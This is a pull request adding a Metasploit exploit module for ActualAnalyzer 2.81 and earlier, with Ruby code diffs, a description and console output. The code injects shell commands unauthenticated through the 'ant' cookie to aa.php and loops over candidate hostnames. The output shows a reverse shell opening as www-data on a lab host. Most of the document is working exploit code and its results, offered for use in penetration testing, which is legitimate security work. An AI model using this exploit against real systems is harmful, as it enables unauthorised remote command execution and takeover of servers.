### PR TITLE
Add actualanalyzer_ant_cookie_exec exploit

### DIFF
--- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
+++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
@@ -123,6 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
     else
       vprint_status("#{peer} - Could not find any hosts on view.php")
     end
+    nil
   end
 
   #
@@ -144,6 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
     else
       vprint_status("#{peer} - Could not find any hosts on code.php")
     end
+    nil
   end
 
   #
@@ -207,6 +209,7 @@ class Metasploit3 < Msf::Exploit::Remote
     else
       vprint_status("#{peer} - Could not find any hosts on admin.php")
     end
+    nil
   end
 
   def execute_command(cmd, opts = { :analytics_host => vhost })
@@ -228,6 +231,7 @@ class Metasploit3 < Msf::Exploit::Remote
     else
       fail_with(Failure::Unknown, "#{peer} - Something went wrong")
     end
+    nil
   end
 
   def exploit
@@ -243,6 +247,7 @@ class Metasploit3 < Msf::Exploit::Remote
       analytics_hosts << datastore['ANALYZER_HOST']
     end
     analytics_hosts.uniq.each do |host|
+      next if host.nil?
       vprint_status("#{peer} - Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...")
       break if execute_command(payload.encoded, { :analytics_host => host })
     end

--- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
+++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
@@ -209,32 +209,42 @@ class Metasploit3 < Msf::Exploit::Remote
     end
   end
 
-  def exploit
-    if datastore['ANALYZER_HOST'].blank?
-      analytics_host = get_analytics_host_code
-      analytics_host = get_analytics_host_view if analytics_host.nil?
-      analytics_host = get_analytics_host_admin if analytics_host.nil?
-      analytics_host = vhost if analytics_host.nil?
-    else
-      analytics_host = datastore['ANALYZER_HOST']
-    end
+  def execute_command(cmd, opts = { :analytics_host => vhost })
     vuln_cookies = %w(anw anm)
-    print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'aa.php'),
-      'vars_get' => { 'anp' => analytics_host },
-      'cookie' => "ant=#{payload.encoded}; #{vuln_cookies.sample}=#{rand(100...999)}.`$cot`"
+      'vars_get' => { 'anp' => opts[:analytics_host] },
+      'cookie' => "ant=#{cmd}; #{vuln_cookies.sample}=#{rand(100...999)}.`$cot`"
     )
     if !res
       fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out")
     elsif res.code == 302 && res.headers['Content-Type'] =~ /image/
       print_good("#{peer} - Payload sent successfully")
+      return true
     elsif res.code == 302 && res.headers['Location'] =~ /error\.gif/
-      fail_with(Failure::BadConfig, "#{peer} - Host '#{analytics_host}' is not monitored by ActualAnalyzer. set ANALYZER_HOST to specify.")
+      vprint_status("#{peer} - Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.")
     elsif res.code == 200 && res.body =~ /Admin area<\/title>/
       fail_with(Failure::Unknown, "#{peer} - ActualAnalyzer is not installed. Try installing first.")
     else
       fail_with(Failure::Unknown, "#{peer} - Something went wrong")
+    end
+  end
+
+  def exploit
+    analytics_hosts = []
+    if datastore['ANALYZER_HOST'].blank?
+      analytics_hosts << get_analytics_host_code
+      analytics_hosts << get_analytics_host_view
+      analytics_hosts << get_analytics_host_admin
+      analytics_hosts << vhost
+      analytics_hosts << '127.0.0.1'
+      analytics_hosts << 'localhost'
+    else
+      analytics_hosts << datastore['ANALYZER_HOST']
+    end
+    analytics_hosts.uniq.each do |host|
+      vprint_status("#{peer} - Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...")
+      break if execute_command(payload.encoded, { :analytics_host => host })
     end
   end
 end


### PR DESCRIPTION
This module exploits a command execution vulnerability in ActualAnalyzer version 2.81 and prior.

The 'aa.php' file allows unauthenticated users to execute arbitrary commands in the 'ant' cookie.

Tested on ActualAnalyzer versions 2.81 and 2.75 on Ubuntu 10.04.3 (PHP 5.3.2-1ubuntu4.17)
### Output

```
msf exploit(actualanalyzer_ant_cookie_exec) > check
[+] 192.168.13.141:80 - The target is vulnerable.
msf exploit(actualanalyzer_ant_cookie_exec) > set verbose true
verbose => true
msf exploit(actualanalyzer_ant_cookie_exec) > check
[*] 192.168.13.141:80 - Found version: 2.81
[+] 192.168.13.141:80 - The target is vulnerable.
```

```
msf exploit(actualanalyzer_ant_cookie_exec) > set verbose true
verbose => true
msf exploit(actualanalyzer_ant_cookie_exec) > run

[*] Started reverse double handler
[+] 192.168.13.141:80 - Found analytics host: bt
[*] 192.168.13.141:80 - Sending payload (531 bytes)...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] 192.168.13.141:80 - Payload sent successfully
[*] Command: echo 2rAYCSKKNtZMdJ57;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n2rAYCSKKNtZMdJ57\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.13.132:4444 -> 192.168.13.141:52285) at 2014-12-06 13:43:52 -0500

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y

[*] 192.168.13.141 - Command shell session 1 closed.  Reason: User exit
```
### Source:
- ActualAnalyzer Lite 2.81:
  `hxxp://www.actualscripts.com/products/analyzer/downloads/editions/lite/file.php?file=lite281.zip`
- ActualAnalyzer Lite 2.75:
  `hxxps://web.archive.org/web/20061114040847/http://www.actualscripts.com/products/analyzer/downloads/editions/lite/lite275.zip`
